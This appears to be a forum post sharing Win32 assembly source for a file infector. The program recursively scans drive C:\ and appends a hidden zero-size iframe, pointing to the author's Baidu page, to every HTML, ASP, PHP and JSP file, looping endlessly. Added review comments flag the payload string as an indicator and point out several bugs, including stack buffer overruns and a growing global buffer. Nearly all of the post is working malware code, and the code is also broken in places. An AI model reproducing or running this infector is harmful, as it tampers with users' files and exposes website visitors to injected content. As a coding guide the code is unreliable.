感染C盘网页文件--win32汇编
;******************************************************;程序编写by netknight
;******************************************************
.386
.model flat, stdcall
option casemap :none
include windows.inc
include kernel32.inc
include user32.inc
include shlwapi.inc
includelib kernel32.lib
includelib user32.lib
includelib shlwapi.lib
include macros.inc
.data
; Payload appended to each infected page: a zero-size iframe pointing at the
; author's page.  This literal is the primary on-disk indicator to search for
; (in .html/.htm/.asp/.aspx/.php/.jsp files, see _InfectWeb).
szInjectURLAddr db '<iframe src=http://hi.baidu.com/netknight/ width=0 height=0></iframe>',0
; Root-path buffer; only referenced from a commented-out line in start, so it
; is unused at run time.  (Reserved as MAX_PATH DWORDs, not bytes.)
szDriveString dd MAX_PATH dup(0)
; Receives the pointer returned by PathFindExtension.  Only one DWORD is ever
; written although 50 are reserved; a global used as a scratch local.
pszExtension dd 50 dup(00h)
; "\r\n" written in front of the payload.  NOTE(review): InjectURLToFile
; lstrcat's the payload onto this 3-byte buffer on every call, so each call
; grows it past its declared size into whatever follows in .data, and the
; text appended to each subsequent file gets longer.
CRLF db 0Dh,0Ah,0
.code
;\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
InjectURLToFile proc _szFilePath,_szInjectURLAddr
; Append "\r\n" + payload to the end of the file at _szFilePath unless the
; file's tail already equals that text.
;   _szFilePath      : NUL-terminated path of the file to modify
;   _szInjectURLAddr : NUL-terminated payload string
; Returns eax = TRUE when the payload was written, FALSE when the file could
; not be opened or was already marked.
; NOTE(review): the LOCALs below carry no type, so MASM reserves one DWORD
; each, yet RtlZeroMemory/lstrcpy/ReadFile treat @szWriteBuf and @szReadBuf
; as MAX_PATH-byte buffers -- that overruns the stack frame.
local @szWriteBuf,@szReadBuf
local @hFile,@WriteBufLen,@dwBytesRead,@dwBytesWrite,@FileOffset
invoke RtlZeroMemory,addr @szWriteBuf,MAX_PATH
invoke RtlZeroMemory,addr @szReadBuf,MAX_PATH
; Open read/write; other processes may still read the file (FILE_SHARE_READ).
invoke CreateFile,_szFilePath,GENERIC_WRITE OR GENERIC_READ,FILE_SHARE_READ,\
0,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,0
.if eax !=INVALID_HANDLE_VALUE
mov @hFile,eax
.else
; Open failed: report FALSE.  NOTE(review): this still jumps to the
; CloseHandle at @@ with @hFile never initialised.
mov eax,FALSE
jmp @f
.endif
; Build the text to write: CRLF followed by the payload.  The concatenation
; is done in place on the global CRLF buffer (see .data), not on a local
; copy, so CRLF keeps growing across calls.
invoke lstrcat,addr CRLF,_szInjectURLAddr
invoke lstrcpy,addr @szWriteBuf,addr CRLF
invoke lstrlen,addr @szWriteBuf
mov @WriteBufLen,eax
not eax ;negate: two's complement = invert, then add one
inc eax
mov @FileOffset,eax
; Seek to -len from the end and read the file's tail back so it can be
; compared with the payload (already-infected check).
invoke SetFilePointer,@hFile,@FileOffset,NULL, FILE_END;read from the end
invoke ReadFile,@hFile,addr @szReadBuf,@WriteBufLen,addr @dwBytesRead,0
; Debug leftover: pops a modal dialog for every candidate file, passing the
; bytes-read counter where MessageBox expects a caption string pointer.
invoke MessageBox,NULL,addr @szReadBuf,addr @dwBytesRead,MB_APPLMODAL
; lstrcmp returns 0 on match: the tail already equals the payload, skip it.
invoke lstrcmp,addr @szReadBuf,addr @szWriteBuf
.if !eax
mov eax,FALSE
jmp @f
.endif
; Not yet marked: append the payload at end of file.
invoke SetFilePointer,@hFile,0,NULL, FILE_END
invoke WriteFile,@hFile,addr @szWriteBuf,@WriteBufLen,addr @dwBytesWrite,0
mov eax,TRUE
@@:
invoke CloseHandle,@hFile
ret
InjectURLToFile endp
;\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
_InfectWeb proc _szDriveString
; Recursively walk the directory tree under _szDriveString and call
; InjectURLToFile on every file whose extension is .html, .htm, .asp, .aspx,
; .php or .jsp (compared case-insensitively).
;   _szDriveString : NUL-terminated directory path without a trailing '\'
; Returns nothing meaningful; eax holds whatever the last API call left.
; NOTE(review): as in InjectURLToFile, the three path LOCALs below are
; untyped (one DWORD each) but are zeroed and filled as MAX_PATH buffers.
local @finddata:WIN32_FIND_DATA
local FHandle
local @szFindDriver,@szFindPath,@szFilePath
invoke RtlZeroMemory,addr @szFindDriver,MAX_PATH
invoke RtlZeroMemory,addr @szFindPath,MAX_PATH
invoke RtlZeroMemory,addr @szFilePath,MAX_PATH
; Search pattern: "<dir>\*.*"
invoke lstrcpy,addr @szFindDriver,_szDriveString
invoke lstrcat,addr @szFindDriver,CTXT("\*.*")
invoke FindFirstFile,addr @szFindDriver,addr @finddata
.if eax!=INVALID_HANDLE_VALUE
mov FHandle,eax
; Loop while the previous Find call succeeded (first pass: the handle itself,
; later passes: the BOOL from FindNextFile).
.while eax!=0
; Skip the "." and ".." entries.
; NOTE(review): "jmp@f" has no space before "@f"; as written MASM reads it
; as a single identifier -- presumably "jmp @f" lost a space in transcription.
invoke lstrcmp,addr @finddata.cFileName,CTXT(".")
.if !eax
jmp@f
.endif
invoke lstrcmp,addr @finddata.cFileName,CTXT("..")
.if !eax
jmp@f
.endif
.if @finddata.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY
; Subdirectory: recurse with "<dir>\<name>".
invoke lstrcpy,addr @szFindPath,_szDriveString
invoke lstrcat,addr @szFindPath,CTXT("\")
invoke lstrcat,addr @szFindPath,addr @finddata.cFileName
invoke _InfectWeb,addr @szFindPath
.else
; Regular file: build the full path and test its extension.
invoke Sleep,1
invoke lstrcpy,addr @szFilePath,_szDriveString
invoke lstrcat,addr @szFilePath,CTXT("\")
invoke lstrcat,addr @szFilePath,addr @finddata.cFileName
invoke PathFindExtension,addr @szFilePath
mov pszExtension,eax
; lstrcmpi returns 0 on a match; any match jumps to InfectWeb.
invoke lstrcmpi,pszExtension,CTXT(".html")
cmp eax,0
je InfectWeb
invoke lstrcmpi,pszExtension,CTXT(".htm")
cmp eax,0
je InfectWeb
invoke lstrcmpi,pszExtension,CTXT(".asp")
cmp eax,0
je InfectWeb
invoke lstrcmpi,pszExtension,CTXT(".aspx")
cmp eax,0
je InfectWeb
invoke lstrcmpi,pszExtension,CTXT(".php")
cmp eax,0
je InfectWeb
invoke lstrcmpi,pszExtension,CTXT(".jsp")
cmp eax,0
jne @f ;no matching extension: advance to the next entry
InfectWeb:
; Extension matched: append the payload, then pause briefly.
invoke InjectURLToFile,addr @szFilePath,addr szInjectURLAddr
invoke Sleep,10
.endif
@@:
invoke FindNextFile,FHandle,addr @finddata
.endw
invoke FindClose,FHandle
.endif
ret
_InfectWeb endp
;\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
start:
; Entry point: walk and infect everything under C:\, then immediately start
; over.  There is no exit path (no ExitProcess), so the process loops
; forever re-walking the drive, relying on InjectURLToFile's tail check to
; avoid re-appending to files it already marked.
@@:
;invoke _InfectWeb,addr szDriveString
invoke _InfectWeb,CTXT("C:")
jmp @B
end start
这个代码比较简单,看懂了 没看懂,嘿嘿!!! 收藏下,呵呵